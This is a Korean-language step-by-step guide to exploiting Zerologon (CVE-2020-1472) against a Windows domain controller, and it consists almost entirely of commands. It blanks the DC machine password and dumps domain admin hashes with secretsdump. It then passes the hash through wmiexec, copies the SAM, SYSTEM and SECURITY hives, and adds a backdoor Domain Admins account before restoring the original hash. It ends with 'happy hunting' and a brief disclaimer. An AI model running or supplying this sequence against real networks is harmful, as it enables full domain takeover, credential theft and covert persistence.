
CVE-2020-1472(CVSS 10/10)를 악용하는 zerologon 스크립트
zerologon 스크립트로 CVE-2020-1472 CVSS 10/10 익스플로잇 익스플로잇 코드는 https://www.secura.com/blog/zero-logon 및 https://github.com/SecuraBV/CVE-2020-1472 기반. 원본 연구 및 스캐너는 Secura, 수정은 RiskSense Inc. https://github.com/risksense/zerologon
익스플로잇을 위해 이전 Impacket 설치를 모두 제거하고 https://github.com/SecureAuthCorp/impacket/commit/b867b21 또는 그 이상 버전에서 Impacket을 설치합니다.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
그런 다음, 다음을 실행합니다:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
성공하면 다음을 할 수 있습니다:
sudo secretsdump.py -just-dc domain/hostname\$@ip
암호 입력 프롬프트에서 "Enter"를 누르면 통과되며, 도메인 관리자 해시를 얻을 수 있습니다. 그 해시를 얻은 후 secretsdump에서 얻은 자격 증명으로 대상 DC에 wmiexec.py를 실행합니다.
wmiexec.py domain/Administrator@ip -hashes hash
그리고 다음을 실행합니다:
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
그리고 만일을 대비해 새 관리자 계정을 만들 수 있습니다:
net user myadmin Hello1234 /ADD /DOMAIN
새 계정을 도메인 관리자 그룹에 추가하여 완전한 권한을 얻습니다:
net group "Domain Admins" myadmin /ADD /DOMAIN
아마도 지금 C:>에서 exit를 입력합니다.
그런 다음 다음을 실행할 수 있습니다:
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
그러면 머신 계정의 원래 NT 해시를 볼 수 있습니다. 그런 다음 다음을 사용하여 원래 머신 계정 해시를 도메인에 다시 설치할 수 있습니다:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
DC가 정상적으로 작동을 계속하려면 원래 해시를 다시 설치하는 것이 필요합니다.
복원 과정이 잘 작동했는지 확인하기 위해 다음을 실행합니다:
sudo secretsdump.py -just-dc domain/hostname\$@ip
그리고 암호 프롬프트에서 "Enter"를 눌러도 더 이상 통과되지 않습니다.
여기까지입니다.
즐거운 사냥 되세요.
면책 조항: 이는 순전히 교육 목적으로 제공되며, 어떠한 행동이나 그 결과에 대해서도 책임을 지지 않습니다. 다른 사람의 장치에 해킹하는 것은 불법이며 법적으로 처벌받을 수 있습니다.